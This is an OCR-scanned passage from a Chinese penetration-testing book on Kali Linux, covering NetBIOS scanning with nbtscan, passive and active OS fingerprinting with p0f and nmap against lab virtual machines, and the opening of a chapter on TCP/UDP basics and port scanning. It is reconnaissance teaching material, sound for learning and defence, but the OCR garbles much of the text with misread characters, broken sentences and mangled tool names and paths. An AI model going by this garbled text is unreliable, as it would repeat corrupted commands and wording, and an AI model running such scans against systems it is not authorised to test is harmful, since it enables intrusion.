从 上 面 的 输出 结 采 可 以 看 出 ， 找 到 的 NetBIOS 名 字 有 : PC-001 ` 
PC-003 和 SRV-001。 现 在 用 下 述 命令 查看 这 些 主机 运行 了 哪些 服务 。 

#nbtscan -hv 192.168.1.1-254 

该 指令 的 返回 结 采 如 下 。 

NetBIOS Name Table for Host 192.168.1.81: 

PC-001 Workstation Service 

PC-001 File Server Service 

WORKGROUP Domain Name 

WORKGROUP Browser Service Elections 

Adapter address 00:25:9c:9f:b0:96 

NetBIOS Name Table for Host 192.168.1.90: 

PC-003 Workstation Service 

PC-003 Messenger Service 

PC-003 File Server Service 


. MSBROWSE Master Browser 
WORKGROUP Domain Name 
WORKGROUP Browser Service Elections 
WORKGROUP Domain Name 
WORKGROUP Master Browser 

Adapter address 00:00:00:00:00:00 


从 上 面 输 出 结果 可 以 看 出 ，PC-001 运 行 了 Workstation (工作 站 服 
务 ) 和 File Server (MEARS as) 。 而 在 PC-003 上 运行 3 个 服务 是 
Workstation ` Messenger 和 File Server ° 经验 表明 ， 这 些 信 息 里 包含 了 
哪 台 机 器 提供 了 文件 共享 服务 。 下 一 步 我 们 可 以 检测 这 些 文 件 共 享 服 
务 是 否 开放 ， 继 而 访问 其 中 的 文件 。 


5.3 识别 系统 


在 确定 目标 主机 在 线 后 ， 应 当 识 别 它们 使 用 的 操作 系统 。 这 阶段 
工作 通常 称 为 识别 操作 系统 〈 也 称 为 操作 系统 指纹 识别 ) 。 识 别 操作 
系统 的 方式 分 为 两 种 : 主动 式 和 被 动 式 。 

主动 式 识别 工具 癌 目 标 机 絮 发 送 数据 包 ， 并 根据 目标 的 啊 应 确定 
其 使 用 的 操作 系统 。 这 种 方式 的 优点 在 于 探测 速度 快 ， 缺 点 是 目标 主 
机 可 能 会 发 现 我 们 探测 操作 系统 的 行为 。 

被 动 式 操作 系统 识别 方法 克服 了 主动 式 识别 方法 的 缺点 。Michal 
Zalewsky 是 这 种 探测 方式 的 先驱 ， 他 设计 的 p0f 工 具 率 先 实现 了 说 动 式 
的 识别 方法 。 被 动 式 方法 的 缺点 是 ， 它 比 主动 式 识别 方法 的 识别 速度 
惕 。 


X 
本 市 将 介绍 两 款 识别 操作 系统 的 工具 。 


5.3.1 pOf 


p0f 采 用 被 动 方式 的 方法 探测 目标 主机 的 操作 系统 类 型 。 这 个 工具 
可 以 识别 以 下 几 种 主机 : 

e 连接 到 您 主机 的 机 器 (SYN 模式 ， 即 默认 模式 ) ; 

e 您 主机 可 以 访问 的 机 器 (SYN+ACK 模式 ) ; 

e 您 主机 不 能 访问 的 机 器 (RST+ 模 式 ) ; 

e 您 可 以 监控 到 其 网 络 通信 有 的 机 器 。 

这 个 程序 通过 自身 发 出 的 TCP 数 据 包 分 析 操 作 系 统 的 类 型 。 然 后 ， 
它 会 统计 在 默认 情况 下 不 会 产生 的 非 标 准 数据 包 。 例 如 ，Linux 内 核 的 
操作 系统 默认 使 用 64 字 市 的 ping 数 据 报 ， 而 Windows 操 作 系 统 则 使 用 32 
字 市 的 ping 数 据 报 。 这 两 个 操作 系统 在 TTL 上 同样 存在 产 别 。Windows 
发 出 的 数据 包 ， 其 TTL 是 128; 而 不 同 版 本 的 Linux 系 统 ， 其 数据 包 的 
TTL 各 有 不 同 。p0f 程 序 正 是 根据 这 些 细微 的 差别 识别 远程 主机 的 操作 
ARG ° 

Kali Linux 自 带 的 p0f 程 序 已 经 无 法 识别 远程 主机 的 操作 系统 。 原 
在 于 这 个 版 本 的 指纹 数据 库 过 于 陈旧 。 不 笠 的 是 ， 我 们 未 能 找到 最 新 
版 本 的 指纹 数据 库 。 所 以 我 们 使 用 了 pOfv3 (Version 3.06b) ， 而 没有 
使 用 Kali Linux 自 带 的 p0f 程序 。 如 需 使 用 这 个 版 本 的 pof， 请 从 官方 网 
站 上 下 载 TARBALL 文件 (http:/Icamtuf.coredump.cx/p0f3/releases/pOf- 
3.06b.tgz) ， 然 后 使 用 其 中 build.sh 脚本 进行 编译 。 默 认 情 况 下 ， 指 纹 
数据 库 就 在 当前 编译 目录 里 。 如 果 您 想 把 它 放 在 其 他 目录 中 (例如 把 
它 保存 为 /etc/p0f/p0f.fp) ， 需 要 修改 config.h 文件 后 再 重新 编译 。 如 果 
您 不 更 改 这 个 设置 ， 就 要 在 每 次 使 用 它 的 时 候 ， 使 用 -{f 选 项 指定 指纹 数 
据 库 的 确切 位 置 。 

在 终端 中 输入 p0f-h 可 查看 它 的 使 用 方法 和 选项 说 明 。 

如 需 使 用 pof 程 序 识别 远程 主机 的 操作 系统 ， 可 以 使 用 下 述 指令 。 

pOf -f /etc/pOf/pOf.fp -o pOf.log 


这 条 指令 将 会 读 取 指纹 数据 库 文件 (Vetc/p0f/p0f.fp) ， 然 后 把 分 析 
日 志保 存 为 p0flog。 与 此 同时 ， 它 在 屏幕 上 显示 下 述 内 容 。 

--- pOf 3.06b by Michal Zalewski<lcamtuf@coredump.cx> -- 

[+] Closed 1 file descriptor. 

[+] Loaded 314 signatures from "etc/pOf/pOf.fp'. 


[+] Intercepting traffic on default interface 'ethO'. 

[+] Default packet filtering configured [^ VLAN]. 

[+] Log file 'pOf.log' opened for writing. 

[+] Entered main event loop. 

然后 ， 您 需要 与 这 台 主 机 建立 TCP 连 接 ， 产 生 一 些 网 络 流 量 。 您 可 
以 浏览 远程 主机 的 文件 ， 或 者 让 远程 主机 连接 到 您 的 主机 © 

如 果 p0f 成 功 地 识别 出 远程 主机 的 操作 系统 ， 这 个 程序 将 会 在 日 志 
文件 (pOflog) 和 屏幕 上 记录 相关 信息 。 

在 我 们 运行 这 个 程序 时 ， 它 在 终端 中 显示 了 如 下 信息 。 

.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (syn) ] 

| 

| client = 192.168.56.101/42819 

| os - Linux 3.x 

| dist -0 


| params = none 


| raw. sig = 4:64+0:0:1460:mss*10,7:mss,sok,ts,nop,ws:df,id+:0 
| 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (mtu) | 


| 
| client = 192.168.56.101/42819 


| link = Ethernet or modem 


| raw. mtu = 1500 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (syn+ack) | 
| 

| Server = 192.168.56.102/80 

| os - Linux 2.6.x 

| dist -0 

| params = none 

| raw. sig = 4:64+0:0:1460:mss*4,5:mss,sok,ts,nop,ws:df:0 
| 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (mtu) ] 
| 

|server = 192.168.56.102/80 

| link = Ethernet or modem 


| raw. mtu = 1500 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (http request) ] 
| 

| client = 192.168.56.101/42819 

| app = Firefox 10.x or newer 

| lang = English 

| params = none 


| raw. sig = 1:Host,User-Agent, Accept=[text/html,application/ 


xhtml+xml,application/xml;q=0.9,*/*;q=0.8],Accept-Language=[en- 
US,en;q 70.5], Accept-Encoding=[gzip, deflate],Connection- 
[keepalive]:Accept-Charset,Keep-Alive:Mozilla/5.0 (X11; Linux x86 64; 
rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (http response) | 


| 
| server = 192.168.56.102/80 


| app = Apache 2.x 

| lang = none 

| params = none 

lraw sig = 1:Date,Server,X-Powered-By=[PHP/5.2.4-2ubuntu5.10],? 
ContentLength,Keep-Alive=[timeout=15, max=100],Connection=[Keep- 
Alive],ContentType: Accept-Ranges:Apache/2.2.8 (Ubuntu) DAV/2 


hy 


相应 的 日 志文 件 如 图 5.17 所 示 。 


(2013/05/28 22:47:57] mod=syn|cli=192.168.56.101/42819|srv=192.168.56.102/80|subj=cli|os=Linux 3.x|dist-0|params-none | raw 
isig=4 :64+6:6:1460:mss*1G6,7:mss,sok,ts,nop,ws:df,id+:0 

[2013/06/28 22:47:57] mod=mtu|cli=192.168.56.101/42819|srv=192.168.56.102/80|subj=cli|link=Ethernet or modem| raw_mtu=1500 
[2013/06/28 22:47:57] mod=syn+ack|cli=192.168.56.161/42819|srv=192.168.56.102/80|subj=srv|os=Linux 2.6.x|dist=0|params=non 
le | raw_sig=4:64+0:0:1460:mss*4,5:mss,sok,ts,nop,ws:df:0 

[2013/06/28 22:47:57] mod=mtu|cli=192.168.56.161/42819|srv=192.168.56.102/80|subj=srv|link=Ethernet or modem|raw mtu-1500 
[2013/06/28 22:47:57] mod-http request |cli=192.168.56.101/42819|srv=192.168 .56.162/80|subj=cliljapp=Firefox 10.x or newer|l 
lang=Engl ish | params=none| raw sig-1:Host,User-Agent , Accept-[text /html , application/xhtml«xml ,application/xml;q-0.9,*/*;q-0.8] 
, Accept -Language-[en-US,en;q-0.5], Accept -Encoding=[gzip, deflate] ,Connection=[keep-alive] :Accept -Charset ,Keep-Alive:Mozill 
a/5.0 (X11; Linux x86 64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 

[2013/06/28 22:47:57] mod-http response|cli-192.168.56.101/42819|srv-192.168.56.102/80|subj -srv|app-Apache 2.x|lang-none|p| 
jaarams-none|raw síg-1:Date,Server,X-Powered-Byz[PHP/5.2.4-2ubuntu5.10] , ?Content -Length,Keep-Alive-[timeout-15, max-100],Con| 
nectionz[Keep-Alive],Content-Type:Accept-Ranges:Apache/2.2.8 (Ubuntu) DAV/2 


图 5.17 


根据 上 述 结果 ， 我 们 可 判断 目标 主机 运行 的 操作 系统 是 Linux 
2.6 ° 


在 目标 主机 上 查看 操作 系统 的 信息 ( 见 图 5.18) 。 


图 5.18 
比较 这 两 组 信息 ， 可 知 pof 获取 的 操作 系统 信息 是 正确 的 。 远 程 主 
机 确实 运行 的 是 Linux Version 2.6。 
按 下 Ctrl+C 组 合 键 可 结束 p0f 程 序 。 


2.3.2 Nmap 


Nmap 有 是 一 款 非常 受 欢迎 的 功能 强大 的 端口 扫描 程序 。 它 还 能 够 识 
别 操作 系统 的 操作 系统 ， 能 够 进行 主动 式 的 操作 系统 指纹 识别 。 如 需 


使 用 操作 系统 识别 功能 ， 您 需要 在 nmap 指 令 中 加 上 -O 选 项 。 

如 需 识 别 192.168.56.102 这 台 主 机 的 操作 系统 ， 我 们 可 使 用 下 述 指 
A^ o 
A 

nmap —O 192.168.56.102 

这 个 指令 的 运行 结果 如 图 5.19 所 示 。 


MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 
Device type: general purpose 

Running: Linux 2.6.X 

OS CPE: cpe:/o:linux:linux kernel:2.6 

OS details: Linux 2.6.9 - 2.6.33 

Network Distance: 1 hop 


OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 15.35 seconds 


图 5.19 
Nmap 此 次 成 功 识别 出 了 目标 主机 的 操作 系统 。 
本 书 的 后 续 章节 还 会 详细 介绍 Nmap 程 序 。 


5.4 本 章 总 结 


本 章 讨 论 了 目标 识别 的 工作 流程 。 我 们 首先 介绍 了 目标 识别 的 作 
FA: 搜索 在 线 主 机 并 识别 目标 主机 的 探 作 系统 。 而 后 ， 我 们 介绍 了 Kali 
Linux 里 可 用 于 目标 识别 的 工具 。 


本 章 介 绍 的 扫描 工具 有 ping、arping、fping、hping3、nping 和 
nbtscan。 我 们 还 介绍 了 在 IPv6 环境 下 进行 主机 扫描 的 工具 ， 例 如 
alive6 ` detect-new-ip6 和 passive_discovery6。 

本 章 还 介绍 了 操作 系统 的 识别 工具 一 一 p0f 和 nmap， 它 们 的 识别 方 
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在 下 一 章 ， 我 们 将 介绍 服务 枚 举 ， 以 及 Kali Linux 中 包含 的 实现 服 
务 枚 举 的 工具 。 


第 6 章 服务 枚 举 


服务 枚 举 是 数 一 种 据 采 集 工 作 ， 用 于 获取 目标 主机 开放 端口 、 操 
作 系 统 和 网 络 服务 等 有 关 信 息 。 渗 透 人 员 通 币 会 首先 识 别 出 在 线 的 目 
标 主机 ， 然 后 再 进行 服务 枚 举 。 在 实际 渗透 测试 中 ， 此 阶段 的 工作 属 
于 探测 过 程 的 一 部 分 。 


本 章 介 绍 下 几 个 内 容 : 
eo img Fath, Aim LABEL BIA 
e ig A fafa LE 


e 枚 举 Windows 系统 SMB 服务 的 扫描 工具 ; 

e 枚 举 SNMP 服 务 的 扫描 工具 ; 

e 枚 举 虑 拟 专用 网 络 (Virtual Private Network, VPN) 的 扫描 工 
CN 

目标 枚 举 旨 在 最 大 程度 地 收集 目标 主机 的 网 络 服务 信息 。 这 些 信 
息 将 使 我 们 在 后 续 阶 段 的 工作 识别 漏洞 的 工作 更 具 针 对 性 。 


6.1 端口 扫描 


HERR, m fate HRE H PH EDLT CP N O FUUD Pig H1 
状态 的 方法 。 主 机 开放 了 某 个 端口 ， 束 意味 着 它 在 这 个 端口 提供 某 种 
网 络 服务 。 如 果 某 个 端口 处 于 关闭 状态 ， 则 说 明 主 机 在 这 个 问 口 上 并 
没有 提供 网 络 服务 。 

在 确定 某 端口 处 于 开放 状态 之 后 ， 攻 击 人 员 吏 会 检查 在 该 端口 提 
供 相 应 服务 的 程序 版 本 ， 以 判断 这 个 版 本 的 程序 是 否 存在 漏洞 。 例 如 
说 ， 主 机 A 使 用 的 是 数 年 前 的 1.0 版 本 的 Web 服 务 端 程 序 ， 而 且 官 方 发 布 
过 这 个 版 本 的 安全 公告 。 公 告 内 容声 明了 1.0 版 本 程序 存在 某 种 漏洞 。 
如 果 攻 击 人 员 能 够 检测 到 服务 器 A 开放 了 Web 服 务 右 ， 而 且 能 够 确定 这 
个 程序 的 版 本 号 ， 他 们 束 能 利用 有 关 信 息 攻 击 服务 器 。 可 见 ， 主 机 上 
服务 软件 的 信息 十 分 重要 。 

在 进行 并 口 扫 揪 的 工作 之 前 ， 我 们 甫 先 人 简要 介绍 一 下 TCP/IP 协 议 
及 其 应 用 。 


6.1.1 TCP/IP 协 议 

TCP/IP 协 议 是 很 多 协议 的 统称 。 这 些 协议 里 最 重要 的 两 个 协议 就 
是 TCP 协 议和 IP 协 议 。IP 协 议 提 供 了 寻 址 、 路 由 等 主机 互联 的 功能 ， 而 
TCP 协 议 约定 了 连接 管理 、 在 两 台 主 机 间 建 立 数据 通信 可 靠 传 输 的 标 
准 。IP 协 议 是 OSI 模 型 的 第 3 层 协 议 ， 而 TCP 协 议 是 传输 层 (OSI 第 4 
E) 协议 。 

UDP 协议 是 和 TCP 同 等 重要 的 传输 层 协议 。 那 么 这 两 种 协议 之 间 的 
区 别 在 哪儿 呢 ? 

简要 地 说 ，TCP 有 以 下 特点 。 

e TCP 协议 是 面 癌 连接 的 协议 : 在 使 用 TCP 协议 传输 数据 之 前 ， 
发 起 连接 的 客户 端 和 受理 连接 的 服务 器 之 间 必 须 通过 三 次 握手 建立 连 
fx © 


€ 客户 端 向 服务 器 发 送 初始 化 连接 的 SYN 请 求 包 。 这 个 数据 包 的 
序列 号 (Sequence number) 字段 将 包含 随机 的 初始 化 序列 号 (ISN) fs 
Ei o 

e 服务 器 将 客户 端 发 送 的 ISN 加 1 之 后 ， 作 为 自己 的 ACK 数 据 序列 
号 ， 以 此 对 客户 端 SYN 信息 表示 确认 ， 而 且 服 务 器 的 数据 包 会 使 用 独 
立 的 序列 号 。IP 数 据 包 里 有 个 专门 的 ACK 标识 位 (flag bit) ， 服 务 器 
把 这 个 标识 位 设置 为 1 以 表示 该 数据 包 是 确认 数据 包 。 

e 客户 端 再 将 服务 器 刚才 回复 的 ISN+1， 并 向 服务 器 发 送 ACK 确 
认 包 。 此 后 ， 两 台 主 机 开始 传输 数据 的 正式 过 程 。 

TCP 协议 终止 连接 的 机 制 如 下 所 示 。 

€ 客户 端 发 送 一 个 含有 FIN (finish) 标志 的 数据 包 。 

€ 服务 器 发 送 ACK 确认 数据 ， 以 告知 客户 端 它 已 经 受理 了 FIN 的 
数据 包 。 

€ 应 用 服务 器 在 关闭 连接 之 前 ， 会 再 发 送 一 个 FIN 数据 包 给 客户 
Wm o 

€ 容 户 端 对 服务 器 的 FIN 请 求 发 送 ACK 确认 数据 包 。 通 常情 况 
下 ， 客 户 端 和 服务 器 在 发 送 FIN 信 号 之 后 都 可 以 独自 关闭 连接 。 

e TCP 协议 是 可 靠 的 传输 协议 : TCP 协议 使 用 序列 号 和 确认 信号 

(ACK 数据 包 ) 来 识别 数据 包 。 每 当 接收 方 收 到 一 个 数据 包 ， 它 都 会 
发 送 ACK 数据 包 以 进行 确认 。 如 果 任 何 一 方 没有 收 到 对 方 的 ACK 数 
据 包 ， 它 会 自动 重 传 。 即 使 接收 方 收 到 了 乱 序 的 数据 包 ， 根 据 TCP 协 
议 ， 接 收 方 可 在 重新 整理 数据 包 的 顺序 之 后 ， 再 把 数据 传 给 (接收 数 
据 的 ) 应 用 程序 。 

多 数 传 送 文 件 的 应 用 程序 ， 或 者 传递 重要 数据 的 程序 都 使 用 TCP 
协议 。 例 如 超 文 本 传输 协议 (HTTP) 和 文件 传输 协议 (FTP) 都 是 基 
于 TCP 的 传输 协议 。 

UDP 协议 的 特征 与 TCP 协 议 相 反 。 


e UDP 协议 不 是 面向 连接 的 协议 。 在 采用 这 种 协议 传输 数据 时 ， 
收发 双方 不 必 建 立 UDP 连 接 。 

e UDP 协议 旨 在 尽 可 能 地 将 数据 包 发 送 到 目标 地 址 。 如 采 在 传输 
过 程 种 发 生 了 丢 包 的 情况 ，UDP 协 议 不 会 自动 重 传 ( 即 操作 系统 不 负 
责 重新 传送 UDP 包 ) 。 由 应 用 程序 决定 是 否 重新 传送 数据 包 。 

能 够 接受 丢 包 情况 的 应 用 程序 ， 例 如 视频 流 和 其 他 多 媒体 程序 ， 
多 数 会 采用 UDP 协 议 传输 数据 。 著 名 的 域名 解析 系统 (DNS) 、 动 态 
主机 配置 协议 (DHCP) 和 简单 网 络 管理 协议 (SNMP) 使 用 的 都 是 
UDP 协议 。 

为 了 能 够 将 网 络 数据 正确 地 传送 给 相应 的 应 用 程序 ， 传 输 层 实现 
了 一 种 名 为 端口 (por) 的 寻 址 方式 。 在 服务 器 端 ， 软 件 程序 都 在 特定 
服务 端口 受理 网 络 数据 ;客户 端 向 服务 器 端口 发 送 的 数据 ， 将 会 被 服 
务 器 端 对 应 的 软件 程序 受理 。 端 口号 码 是 16 位 的 编码 ， 取 值 范 围 是 0~ 
65535。 为 了 避免 使 用 上 的 寓 乱 ， 这 些 端 口 大 多 有 着 约定 俗 成 的 用 途 。 

e 公认 的 端口 (0—1023) : 这 个 范围 内 的 端口 又 称 为 保留 端口 ， 
通常 供 系统 管理 员 (或 高 权限 用 户 ) 运行 的 服务 端 程序 使 用 。SSH (22 
号 端口 ) ` HTTP 〈80 号 端口 ) ^ HTTPS (443 号 端口 ) 等 常用 服务 端 
口 都 是 这 个 范围 内 的 端口 。 

e 注册 的 端口 1024 一 49151) : Internet 授权 地 址 分 配 组 
(IANA) 提供 这 一 范围 内 的 端口 的 注册 服务 。 人 们 可 以 把 他 们 自己 的 
客户 端 /服务 器 程序 (client-server application) 所 使 用 的 端口 号 在 IANA 
登记 备案 。 

e 私有 端口 /动态 端口 (49152~65535) : 所 有 人 都 可 以 随意 使 用 
这 个 范围 内 的 端口 ， 而 不 必 癌 IANA 注册 端口 号 。 

在 向 要 讨论 了 TCP 和 UDP 之 间 的 区 别 之 后 ， 我 们 接 下 来 介绍 TCP 和 
UDP 数据 包 的 具体 格式 。 


6.1.2 TCPTHUDP I 


TCPZ ©U ETCP[ E Et (segment) 。 每 个 TCP 消 息 段 由 报头 

(header) 和 数据 构成 。 如 果 TCP 消息 段 不 含有 TCP 选项 (TCP 

option) ， 那 么 它 的 报头 的 大 小 应 当 是 20 字 节 (IPv4) 。 整 个 消息 段 的 
结构 如 图 6.1 所 示 。 


源 端 口 目的 端口 
(16 位 ) (16 位 ) 
序列 号 
(32 位 ) 


确认 号 
(32 位 ) 


HLen Rsvd 控制 位 窗口 大 小 
(4 位 ) (4 位 ) (4 位 ) (16 位 ) 


校 验 和 紧急 指针 
(16 位 ) (16 位 ) 


图 6.1 
上 述 各 字段 的 作用 如 下 。 
e 源 端 口 和 目的 端口 各 占 16 位 。 源 端口 是 发 送 方 在 发 送 该 数据 包 
时 所 使 用 的 端口 ， 目 的 端口 是 接收 方 接 收 该 数据 的 端口 。 
e 序列 号 是 32 位 数据 。 在 常规 情况 下 ， 它 是 标识 这 个 消息 段 的 序 


列 编 号 。 
e 确认 号 同样 是 32 位 数据 。 它 是 上 一 次 已 成 功 收 到 的 数据 字 节 序 
号 加 1。 


e HLen 是 TCP 报头 的 长 度 ， 它 占 了 32 位 数据 中 的 头 4 位 。 
e Rsvd 是 个 4 位 大 小 的 保留 字段 ， 它 的 值 必须 为 零 。 


e 控制 位 的 4 位 数据 可 以 通过 排列 组 合 表示 8 个 lbit 的 标志 位 。 在 
IH @ AY REC 793 规 范 中 (REC 793 的 下 载 地 址 是 http://www.ietf. 
org/rfc/rfc793.txt) ，TCP 只 有 6 个 标志 位 。 

SYN: 同步 标志 位 ， 此 位 在 建立 会 话 时 使 用 。 

ACK: 包含 该 确认 字段 的 TCP 数据 ， 是 对 以 前 接收 到 的 数据 包 的 
确认 。 

RST: 重 置 连接 的 标识 位 。 

FIN: 表示 发 送 方 已 经 没有 数据 需 发 送 ， 将 要 以 正常 方式 关闭 连 
接 。 

PSH: 告诉 接收 方 应 当 把 缓冲 区 的 数据 立即 推送 给 应 用 程序 ， 而 
不 要 再 等 待 接收 更 多 的 数据 。 

URG: 这 个 标识 位 用 以 说 明 TCP 报 头 里 的 紧急 指针 (Urgent 
Pointer) 有 特殊 含义 。 紧 急 指针 和 序号 字段 相 加 的 和 ， 表 示 最 后 一 个 
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e 后 来 ， 新 推出 的 REC 3168 (http://www.ietf.org/rfc/rfc3168.txt ) 
增加 了 两 个 标志 位 。 

Congestion Window Reduced (CWR) : 窗口 调整 标识 位 。 数 据 发 
送 方 通过 这 个 标识 位 通知 接收 方 * 由 于 网 络 拥塞 ， 不 得 不 减 小 发 送 队 列 
的 长 度 (缩小 TCP 窗 口 ) ” 

Explicit Connection Notification-Echo (ECN-Echo) : 拥塞 通告 标 
识 位 。 这 个 标识 位 表明 网 络 连接 存在 拥塞 问题 。 

e 窗口 大 小 占 报 文 头 的 16 位 。 它 用 来 声明 接收 方 将 接收 的 字 节 数 


e 校 验 和 占 16 位 ， 用 于 校 验 TCP 报头 和 数据 体 。 
这 些 标志 位 可 单独 设置 。 
如 需 全 面 了 解 TCP 协 议 的 各 项 规范 ， 请 参阅 RFC 793 和 RFC 3168 ° 


在 使 用 含有 SYN 的 数据 包 进 行 端口 扫描 时 ， 攻 击 者 可 能 收 到 的 远 
程 响应 分 为 以 下 几 种 。 

e 目标 主机 回应 SYN-ACK 包 。 如 果 收 到 了 这 种 数据 包 ， 我 们 可 以 
确定 该 端口 处 于 开放 状态 。 这 是 TCP 规范 (RFC 793) 中 定义 的 标准 
啊 应 方式 。 依 据 RFC 793， 开 放 端 口 在 收 到 SYN 包 时 必须 回应 SYN- 
ACK 包 ， 而 不 处 理 SYN 包 里 的 具体 数据 。 

e 目标 主机 可 能 会 返回 数据 包 ， 而 且 这 个 数据 包 设 有 RST 标 识 位 和 
ACK 标识 位 。 这 意味 该 端口 处 于 关闭 状态 。 

e 目标 主机 可 能 会 返回 一 个 ICMP 消息 (例如 ，ICMP Port 
Unreachable) 。 多 数 情况 下 ， 这 是 防火 墙 阻止 了 SYN 数 据 包 造 成 的 。 

e 目标 主机 还 有 可 能 不 进行 响应 。 无 论 目 标 主 机 的 这 个 端口 没有 开 
放 网 络 服 务 ， 还 是 防火 墙 以 静默 模式 阻塞 了 探测 的 SYN 包 ， 都 可 能 发 
生 这 种 情况 。 

渗透 测试 人 员 只 对 开放 的 端口 感 兴趣 ， 因 为 这 些 开放 端口 的 背后 
必然 是 某 种 服务 程序 ， 而 这 些 服务 端 程序 正 是 后 续 测试 的 对 象 。 


要 想 使 渗透 测试 的 攻击 工作 富有 成 效 ， 束 要 在 充分 理解 TCP 行为 
的 基础 上 进行 端口 扫 摘 。 

下 文 将 从 报头 格式 开始 介绍 UDP 协议 。 我 们 首先 介绍 UDP 数据 的 
报头 ( 见 图 6.2) 。 


0 15 31 
图 6.2 


上 图 中 各 字段 的 功能 如 下 。 


e 和 TCP 报头 一 样 ，UDP 报头 也 有 相应 的 源 端 口 和 目的 端口 。 这 
两 个 字段 各 占 16 位 。 源 端口 是 发 送 数据 包 的 主机 使 用 的 端口 ， 目 的 端 
口 是 接 收 数据 的 目标 主机 的 端口 。 

e UDP 长 度 是 UDP 报头 的 长 度 。 

e UDP 校 验 和 是 用 于 检测 UDP 报头 和 数据 错误 的 16 位 校 验 和 。 

请 注意 UDP 报 文 头 没有 序列 号 和 确认 号 ， 也 没有 控制 位 。 

在 扫描 目标 主机 的 UDP 端口 时 ， 攻 击 者 可 能 收 到 的 啊 应 分 为 以 下 
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e 目标 主机 回复 UDP 数据 包 。 如 采 收 到 了 回复 数据 ， 可 判断 该 端 
口 处 于 开放 状态 。 

e 目标 主机 可 能 会 返回 ICMP 消 息 (例如 ，ICMP Port 
Unreachable) 。 这 种 消息 表明 该 端口 处 于 关闭 状态 。 但 是 如 果 收 到 的 
是 ICMP Port Unreachable 以 外 的 ICMP 信 息 ， 则 意味 着 防火 墙 阻止 了 到 
这 个 端口 的 通信 。 

e 目标 主机 还 可 能 不 进行 任何 啊 应 ， 以 下 情况 都 可 能 发 生 这 种 情 
D: 

o 端口 处 于 关闭 状态 ; 

o 入 站 (inbound) UDP 包 被 过 滤 了 ; 

o 目标 主机 的 啊 应 被 屏蔽 了 。 

UDP 端口 扫描 结 果 的 可 靠 程度 不 及 TCP 扫 朱 。 在 某 些 情况 下 ， 工 作 
于 UDP 协 议 的 服务 端 程序 可 能 只 响应 特定 类 型 的 UDP 数据 包 。 所 以 在 
进行 UDP 端口 扫 撒 时， 即使 某 些 端口 处 于 开放 状态 ， 目 标 主机 同样 可 
能 没有 任何 响应 。 

前 文 已 经 简要 介绍 了 端口 扫描 的 理论 ， 后 文 将 介绍 实践 的 环节 。 
后 续 章 节 里 ， 我 们 通过 几 款 工具 进行 网 络 扫描 。 

为 了 便于 本 书 演示 ， 我 们 将 对 装 有 Metasploitable 的 虚拟 主机 进行 
扫 撒 。 第 1 章 介绍 过 它 的 安装 和 配置 方法 。 在 后 续篇 幅 里 ， 除 非特 别 声 


Hj, ，Metasploitable 虚 拟 机 的 下 地 址 是 192.168.56.103， 而 我 们 进行 渗透 
测试 的 主机 地 址 是 192.168.56.102 ° 


6.2 网 络 扫描 程序 


本 地 将 介绍 多 球 工 具 。 这 些 工具 可 发 现 开 放 问 口 ， 识 别 远 程 主机 
的 操作 系统 ， 枚 举 运 行 其 上 的 各 种 服务 。 

服务 枚 举 是 在 特定 主机 、 特 定 端口 上 识别 服务 端 程序 版 本 的 方 
法 。 有 了 服务 器 端 软 件 的 版 本 信息 ， 测 试 人 员 束 可 以 查找 该 版 本 上 和 存 
在 的 安全 漏洞 。 

确实 有 一 些 管理 员 有 定期 更 改 服务 程序 运行 端口 的 习惯 。 例 如 ， 
SSH 服务 程序 的 通常 运行 在 22 号 端口 上 ， 但 是 系统 管理 员 可 能 把 它 改 
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口 ， 就 不 会 发 现 目标 主机 运行 了 SSH 服 务 。 在 非 标 准 端口 上 运行 的 专用 
程序 往往 也 是 渗透 测试 人 员 的 一 大 难题 。 服 务 枚 举 工 具 能 够 在 一 定 程 
度 上 减轻 这 两 方面 的 问题 。 使 用 服务 枚 举 工具 对 全 部 端口 进行 无 差别 
扫 摘 ， 会 增加 识别 成 功 的 几率 。 


6.2.1 Nmap 


Nmap 是 被 专业 人 员 广 泛 使 用 的 一 笋 功能 全 面 的 端口 扫描 工具 
由 Fyodor 编写 并 维护 。 由 于 Nmap 品 质 齐 越 ， 使 用 灵活 ， 它 已 经 是 
测试 人 员 必 备 的 工具 。 

除了 端口 扫描 外 ，Nmap 还 具备 如 下 功能 e 

e 主机 探测 : Nmap 可 查找 目标 网 络 中 的 在 线 主机 。 默 认 情 况 下 ， 
Nmap 通过 4 种 方式 一 ICMP echo 请 求 (ping) 、 向 443 端 口 发 送 TCP 
SYN 包 、 向 80 端 口 发 送 TCP ACK 包 和 ICMP 时 间 惟 请 求 一 -发现 目标 
主机 。 


I. 
渗透 


e HAS IUIS: 在 发 现 开放 端口 后 ，Nmap 可 进一步 检查 目标 主 
机 的 检测 服务 协议 、 应 用 程序 名 称 、 版 本 号 等 信息 。 

e 操作 系统 检测 : Nmap 向 远程 主机 发 送 一 系列 数据 包 ， 并 能 够 将 
远程 主机 的 啊 应 与 操作 系统 指纹 数据 库 进 行 比较 。 如 果 发 现 了 匹配 结 
有 果 ， 它 就 会 显示 匹配 的 操作 系统 。 它 确实 可 能 无 法 识别 目标 主机 的 操 
VERS; 在 这 种 情况 下 ， 如 果 您 知道 日 标 系 统 上 使 用 的 何 种 操作 系 
统 ， 可 在 它 提供 的 URL 里 提交 有 关 信 息 ， 更 新 它 的 操作 系统 指纹 数据 
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e 网 络 路 由 跟踪 : 它 通 过 多 种 协议 访问 目标 主机 的 不 同 端口 ， 以 尽 
可 能 访问 目标 主机 。Nmap 路 由 跟踪 功能 从 TITLE 的 高 值 开 始 测试 ， 逐 步 
递减 TIL， 直 到 它 到 零 为 止 。 

e Nmap 脚本 引擎 : 这 个 功能 扩充 了 Nmap 的 用 途 。 如 末 您 要 使 用 
Nmap 实现 它 (在 默认 情况 下 ) 没有 的 检测 功能 ， 可 利用 它 的 脚本 引擎 
手写 一 个 检测 脚本 。 目 前 ，Nmap 可 检查 网 络 服务 的 漏洞 ， 还 可 以 枚 举 
目标 系统 的 资源 。 

应 当 养 成 时 常 更 新 Nmap 的 好 习惯 。 如 果 需 要 在 Kali Linux 里 安装 
